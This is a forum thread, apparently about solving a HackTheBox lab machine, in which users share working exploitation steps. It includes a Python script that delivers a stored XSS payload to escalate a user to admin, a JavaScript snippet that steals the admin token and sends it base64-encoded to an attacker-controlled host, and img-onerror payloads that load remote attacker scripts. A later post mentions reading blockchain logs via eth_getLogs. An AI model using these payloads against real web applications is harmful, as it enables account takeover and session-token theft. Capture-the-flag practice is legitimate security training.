Possibly Related Threads…

Unbutton8074 · Nov 17, 2024, 05:31 PM

(Nov 17, 2024, 05:20 PM)0x410x420x41 Wrote: I was able to update it, however indeed i am getting 401 as well

```
import requests
from time import sleep

payload = "<img src=x onerror=\"fetch('/api/update_role', {method: 'POST', headers: { 'Content-Type': 'application/json'}, body: JSON.stringify({ 'username': 'hacker', 'role': 'admin'})})\" />"

url = 'http://10.129.121.94'
headers = {
"Content-Type": "application/json"
}

s = requests.Session()
print(f"Logging in and sending payload")
r = s.post(f'{url}/api/login', headers=headers, json={"username": "hacker", "password": "hacker"})

print("Reporting user")
r = s.post(f'{url}/api/report_user', headers=headers, json={ "username": payload })
print(r.status_code)
print(r.text)

```

but looks like /admin is unavailable even if you have admin role

Shoseathe · Nov 17, 2024, 06:30 PM

You can steal the admin token like this:

fetch('/api/info').then(response => response.text()).then(text => {

    fetch('http://YOUR_IP/log?' + btoa(text), {

        mode: 'no-cors'

    });

});

And with the admin token you can successfully access /admin. From there you will see a endpoint /api/json-rpc

standby123 · Nov 17, 2024, 08:02 PM

For those who struggling with the foothold, check the transactions log data using `eth_getLogs` method

xianling88 · Nov 18, 2024, 04:03 AM

still no clue how to do this from step 1 and why is that cause my lack of knowledge and skill at blockchain and smart contract.

Unbutton8074 · Nov 18, 2024, 07:49 AM

(Nov 17, 2024, 08:02 PM)standby123 Wrote: For those who struggling with the foothold, check the transactions log data using `eth_getLogs` method

looks like mine returns only usernames in data fields - keira and my test user

{"id":1,"jsonrpc":"2.0","result":[{"address":"0x75e41404c8c1de0c2ec801f06fbf5ace8662240f","blockHash":"0x2fabc9b399133b8ba6792139df43b9072eb284763cd96a258f730f9f909ecd50","blockNumber":"0x1","blockTimestamp":"0x673a84ec","data":"0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000056b65697261000000000000000000000000000000000000000000000000000000","logIndex":"0x0","removed":false,"topics":["0xda4cf7a387add8659e1865a2e25624bbace24dd4bc02918e55f150b0e460ef98"],"transactionHash":"0x95125517a48dcf4503a067c29f176e646ae0b7d54d1e59c5a7146baf6fa93281","transactionIndex":"0x0"},{"address":"0x75e41404c8c1de0c2ec801f06fbf5ace8662240f","blockHash":"0x13cc5e86991d323ca8da449e4ac2a255777c8a005e31164e10157e64147c934b","blockNumber":"0xd","blockTimestamp":"0x673ade90","data":"0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000047465737400000000000000000000000000000000000000000000000000000000","logIndex":"0x0","removed":false,"topics":["0xda4cf7a387add8659e1865a2e25624bbace24dd4bc02918e55f150b0e460ef98"],"transactionHash":"0x277ccb3b50b8b66ede314aa050a399937fe6bedb0953f1dabaeeed1435e670b6","transactionIndex":"0x0"}]}

olkn00b · Nov 18, 2024, 07:55 AM

(Nov 17, 2024, 06:30 PM)Shoseathe Wrote: You can steal the admin token like this:

fetch('/api/info').then(response => response.text()).then(text => { fetch('http://YOUR_IP/log?' + btoa(text), { mode: 'no-cors' }); });
And with the admin token you can successfully access /admin. From there you will see a endpoint /api/json-rpc

where you able to get this to work with an external script? or directly with xss by wrapping it in the correct tags? (img)

Shoseathe · Nov 18, 2024, 08:21 AM

(Nov 18, 2024, 07:55 AM)olkn00b Wrote:
(Nov 17, 2024, 06:30 PM)Shoseathe Wrote: You can steal the admin token like this:

fetch('/api/info').then(response => response.text()).then(text => { fetch('http://YOUR_IP/log?' + btoa(text), { mode: 'no-cors' }); });
And with the admin token you can successfully access /admin. From there you will see a endpoint /api/json-rpc

where you able to get this to work with an external script? or directly with xss by wrapping it in the correct tags? (img)

I used an external script for it. The request for the external script was pretty reliable but getting the admin token back needed multiple tries, like 10 or 20

olkn00b · Nov 18, 2024, 08:39 AM

(Nov 18, 2024, 08:21 AM)Shoseathe Wrote:
(Nov 18, 2024, 07:55 AM)olkn00b Wrote:
(Nov 17, 2024, 06:30 PM)Shoseathe Wrote: You can steal the admin token like this:

fetch('/api/info').then(response => response.text()).then(text => { fetch('http://YOUR_IP/log?' + btoa(text), { mode: 'no-cors' }); });
And with the admin token you can successfully access /admin. From there you will see a endpoint /api/json-rpc

where you able to get this to work with an external script? or directly with xss by wrapping it in the correct tags? (img)

I used an external script for it. The request for the external script was pretty reliable but getting the admin token back needed multiple tries, like 10 or 20

Thank You!

xianling88 · Nov 18, 2024, 11:00 AM

(Nov 18, 2024, 08:21 AM)Shoseathe Wrote:
(Nov 18, 2024, 07:55 AM)olkn00b Wrote:
(Nov 17, 2024, 06:30 PM)Shoseathe Wrote: You can steal the admin token like this:

fetch('/api/info').then(response => response.text()).then(text => { fetch('http://YOUR_IP/log?' + btoa(text), { mode: 'no-cors' }); });
And with the admin token you can successfully access /admin. From there you will see a endpoint /api/json-rpc

where you able to get this to work with an external script? or directly with xss by wrapping it in the correct tags? (img)

I used an external script for it. The request for the external script was pretty reliable but getting the admin token back needed multiple tries, like 10 or 20

<img src=x onerror="var script = document.createElement('script'); script.src = 'http://10.10.16.10/exploit.js'; document.body.appendChild(script);" />

I used this to trigger the content of yours, but didn't get admin token, where is wrong???

olkn00b · Nov 18, 2024, 11:31 AM

(Nov 18, 2024, 11:00 AM)xianling88 Wrote:
(Nov 18, 2024, 08:21 AM)Shoseathe Wrote:
(Nov 18, 2024, 07:55 AM)olkn00b Wrote:
(Nov 17, 2024, 06:30 PM)Shoseathe Wrote: You can steal the admin token like this:

fetch('/api/info').then(response => response.text()).then(text => { fetch('http://YOUR_IP/log?' + btoa(text), { mode: 'no-cors' }); });
And with the admin token you can successfully access /admin. From there you will see a endpoint /api/json-rpc

where you able to get this to work with an external script? or directly with xss by wrapping it in the correct tags? (img)

I used an external script for it. The request for the external script was pretty reliable but getting the admin token back needed multiple tries, like 10 or 20

<img src=x onerror="var script = document.createElement('script'); script.src = 'http://10.10.16.10/exploit.js'; document.body.appendChild(script);" />

I used this to trigger the content of yours, but didn't get admin token, where is wrong???

try this one, and spam it.

<img src=\"1\" onerror=\"this.remove(); var s=document.createElement('script'); s.src='http://10.10.xx.xx/script.js'; document.body.appendChild(s);\">

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	Hack the box Pro Labs, VIP, VIP+ 1 month free Method	RedBlock	23	2,168	1 hour ago Last Post: kkkato
	[FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags	Techtom	20	2,491	Yesterday, 11:06 PM Last Post: op334
	[FREE] HackTheBox All Cheatsheets	Tamarisk	3	396	Yesterday, 10:36 PM Last Post: op334
	[FREE] 300+ Writeups PDF HackTheBox/HTB premium retired	Tamarisk	369	92,002	Yesterday, 04:10 PM Last Post: sabbyahmed
	CBBH Write Ups	hiddenhacker	22	6,226	Yesterday, 06:39 AM Last Post: Usercomplex